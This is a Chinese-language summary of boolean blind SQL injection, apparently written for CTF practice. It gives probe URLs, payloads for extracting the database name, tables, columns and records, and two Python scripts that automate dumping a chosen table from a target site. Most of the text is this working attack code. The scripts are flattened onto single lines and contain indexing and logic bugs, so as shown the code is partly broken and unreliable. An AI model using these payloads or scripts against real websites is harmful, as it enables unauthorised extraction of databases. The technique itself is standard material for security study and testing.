SQL盲注小结
SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注,所以有必要总结一下。
测试是否为布尔盲注:
http://localhost/index.php?id=2
http://localhost/index.php?id=2'
http://localhost/index.php?id=2''
http://localhost/index.php?id=2%23
http://localhost/index.php?id=2' and 1=1#
若为布尔盲注,则按照以下步骤进行:
一、得到数据库的长度
http://localhost/index.php?id=2' and length(database())>1%23
二、获取数据库名称
姿势:http://localhost/index.php?id=2' and ascii(substr(database(), {0}, 1))={1}%23
python脚本自动获取:
import requests def getDBName(DBName_len): DBName = "" success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2" success_response_len = len(requests.get(success_url).text) url_template = "http://ctf5.shiyanbar.com/web/index_3.php?id=2' and ascii(substr(database(),{0},1))={1}%23" chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' print("Start to retrieve database name...") print("Success_response_len is: ", success_response_len) for i in range( 1, DBName_len + 1): print("Number of letter: " , i) tempDBName = DBName for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: DBName += char print("DBName is: " + DBName + "...") break if tempDBName == DBName: print("Letters too little! Program ended." ) exit() print("Retrieve completed! DBName is: " + DBName) getDBName(5)
三、获取表长度
姿势:http://localhost/index.php?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
四、获取表名
和第二步获得数据库名差不多,姿势稍微变了一下:
http://localhost/index.php?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)), {0}, 1)={1}%23
五、获取字段的个数和长度
姿势:http://localhost/index.php?id=2' and (select length(column_name) from information_schema.columns where table_name = 0x666C6167 limit 0,1)>0%23
其中limit 0,1表示第一列,limit 1,1为第二列,依次类推。
六、获取字段名称
姿势:http://localhost/index.php?id=2' and ascii(substr((select column_name from information_schema.columns where table_name = 0x666C6167 limit 0,1), {0}, 1))={1}%23
七、脱裤
1.首先判断有该表有多少条记录:
http://localhost/index.php?id=2' and (select count(*) from flag)>0%23
2.然后获取当前记录的长度:
http://localhost/index.php?id=2' and (select length(flag) from flag limit 0,1)>0%23
3.获取当前记录的值:
http://localhost/index.php?id=2' and ascii(substr((select flag from flag limit 0,1), {0}, 1))={1}%23
python脚本
import requests import binascii MAX_DBName_len = 100 MAX_TableName_len = 100 MAX_ColumnName_len = 100 MAX_Data_len = 100 MAX_Table_Num = 100 MAX_Column_Num = 100 MAX_Data_Num = 100 success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2" success_response_len = len(requests.get(success_url).text) chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()' def get_DBName_len(): print("Start to get DBName_len...") DBName_len = 0 url_template = success_url + "' and (length(database()))>{0}%23" for i in range(0, MAX_DBName_len): url = url_template.format(i) response = requests.get(url) if len(response.text) != success_response_len: DBName_len = i; print("DBName_len is: ", DBName_len) break; if DBName_len == 0: if i == MAX_DBName_len - 1: print("DBName_len > MAX_DBName_len!") print("Cannot get DB_len. Program ended.") exit() return DBName_len def get_DBName(DBName_len): print("Start to retrieve database name...") DBName = "" url_template = success_url + "' and ascii(substr(database(),{0},1))={1}%23" for i in range(1, DBName_len + 1): print("Number of letter: ", i) tempDBName = DBName for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: DBName += char print("DBName is: " + DBName + "...") break if tempDBName == DBName: print("Letters too little! Program ended.") exit() print("Retrieve completed! DBName is: " + DBName) return DBName def get_TableName_len(Table_num): print("Start to get TableName_len...") TableName_len = 0 url_template = success_url + "' and (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)>{1}%23" for i in range(0, MAX_TableName_len): url = url_template.format(Table_num - 1, i) response = requests.get(url) if len(response.text) != success_response_len: TableName_len = i # print("TabelName_len is: ", TableName_len) break if TableName_len == 0: if i == MAX_TableName_len - 1: print("TableName_len > MAX_TableName_len!") # print("Cannot get TableName_len. Program ended.") return TableName_len def get_TableName(Table_num, TableName_len): print("Start to get TableName...") TableName = "" url_template = success_url + "' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}%23" for i in range(1, TableName_len + 1): print("Number of letter: ", i) tempTableName = TableName for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(Table_num - 1, i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: TableName += char print("TableName is: " + TableName + "...") break if tempTableName == TableName: print("Letters too little! Program ended.") exit() print("Retrieve completed! TableName is: " + TableName) return TableName def choose_Table(): Tables = [] for Table_num in range(1, MAX_Table_Num): TableName_len = get_TableName_len(Table_num) if TableName_len == 0: break TableName = get_TableName(Table_num, TableName_len) Tables.append(TableName) for i in range(len(Tables)): print(i, ": " + Tables[i - 1]) value = input('Please input number to choose which table you want to dump:') Table_num_chosen = int(value) print("You have chose table: " + Tables[Table_num_chosen - 1]) return Tables[Table_num_chosen - 1] def get_ColumnName_len(Column_num, TableName): print("Start to get ColumnName_len...") ColumnName_len = 0 url_template = success_url + "' and (select length(column_name) from information_schema.columns where table_name = {0} limit {1},1)>{2}%23" for i in range(0, MAX_ColumnName_len): url = url_template.format(str2hex(TableName), Column_num - 1, i) response = requests.get(url) if len(response.text) != success_response_len: ColumnName_len = i print("ColumnName_len is: ", ColumnName_len) break if ColumnName_len == 0: if i == MAX_ColumnName_len - 1: print("ColumnName_len > MAXName_Column_len!") return ColumnName_len def get_ColumnName(Column_num, ColumnName_len, TableName): print("Start to get ColumnName...") ColumnName = "" url_template = success_url + "' and ascii(substr((select column_name from information_schema.columns where table_name = {0} limit {1},1),{2},1))={3}%23" for i in range(1, ColumnName_len + 1): print("Number of letter: ", i) tempColumnName = ColumnName for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(str2hex(TableName), Column_num - 1, i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: ColumnName += char print("ColumnName is: " + ColumnName + "...") break if tempColumnName == ColumnName: print("Letters too little! Program ended.") exit() print("Retrieve completed! ColumnName is: " + ColumnName) return ColumnName def get_Columns(TableName): Columns = [] for Column_num in range(1, MAX_Column_Num): ColumnName_len = get_ColumnName_len(Column_num, TableName) if ColumnName_len == 0: break ColumnName = get_ColumnName(Column_num, ColumnName_len, TableName) Columns.append(ColumnName) for i in range(len(Columns)): print(i, ": " + Columns[i - 1]) return Columns def get_Data_len(TableName, ColumnName, Data_num): print("Start to get Data_len...") Data_len = 0 url_template = success_url + "' and (select length({0}) from {1} limit {2},1)>{3}%23" for i in range(0, MAX_Data_len): url = url_template.format(ColumnName, TableName, Data_num - 1, i) response = requests.get(url) if len(response.text) != success_response_len: Data_len = i print("Data_len is: ", Data_len) break if Data_len == 0: if i == MAX_Data_len - 1: print("Data_len > MAX_Data_len!") return Data_len def get_Data(TableName, ColumnName, Data_num, Data_len): print("Start to get Data...") Data = "" url_template = success_url + "' and ascii(substr((select {0} from {1} limit {2},1),{3},1))={4}%23" for i in range(1, Data_len + 1): print("Number of letter: ", i) tempData = Data for char in chars: print("Test letter " + char) char_ascii = ord(char) url = url_template.format(ColumnName, TableName, Data_num - 1, i, char_ascii) response = requests.get(url) if len(response.text) == success_response_len: Data += char print("Data is: " + Data + "...") break if tempData == Data: print("Letters too little! Program ended.") exit() print("Retrieve completed! Data is: " + Data) return Data def get_Data_num(TableName): print("Start to get Data_num...") Data_num = 0 url_template = success_url + "' and (select count(*) from {0})>{1}%23" for i in range(0, MAX_Data_Num): url = url_template.format(TableName, i) response = requests.get(url) if len(response.text) != success_response_len: Data_num = i print("Data_num is: ", Data_num) break if Data_num == 0: if i == MAX_Data_Num - 1: print("Data_num > MAX_Data_Num!") print("Cannot get Data_len.") return Data_num def str2hex(str): result = "0x" str_byte = str.encode() result = result + binascii.b2a_hex(str_byte).decode() return result DBName_len = get_DBName_len() DBName = get_DBName(DBName_len) TableName = choose_Table() Columns = get_Columns(TableName) Data_num = get_Data_num(TableName) Datas = [] for i in range(len(Columns)): ColumnName = Columns[i] for j in range(Data_num): Data_len = get_Data_len(TableName, ColumnName, Data_num) Data = get_Data(TableName, ColumnName, Data_num, Data_len) Datas[j] += "\t" + Data print("***************************") print("Database: " + DBName + "Table: " + TableName) print("***************************") print("\t") for i in range(len(Columns)): print(Columns[i], end="\t") for i in range(Data_num): print(Datas[i]) print("Program successfully ended!") print("***************************") # #the first table # Table_num = 1 # TableName_len = get_TableName_len(Table_num) # TableName = get_TableName(Table_num, TableName_len) # # #the first column # Column_num = 1 # ColumnName_len = get_ColumnName_len(Column_num, TableName) # ColumnName = get_ColumnName(Column_num, ColumnName_len) # # #the first record # Data_num = 1 # Data_len = get_Data_len(TableName, ColumnName, Data_num) # Data = get_Data(TableName, ColumnName, Data_num, Data_len) # # print("***************************") # print("Database: " + DBName) # print("Table: " + TableName) # print("Column: " + ColumnName) # print("Data: " + Data) # print("Program successfully ended!") # print("***************************")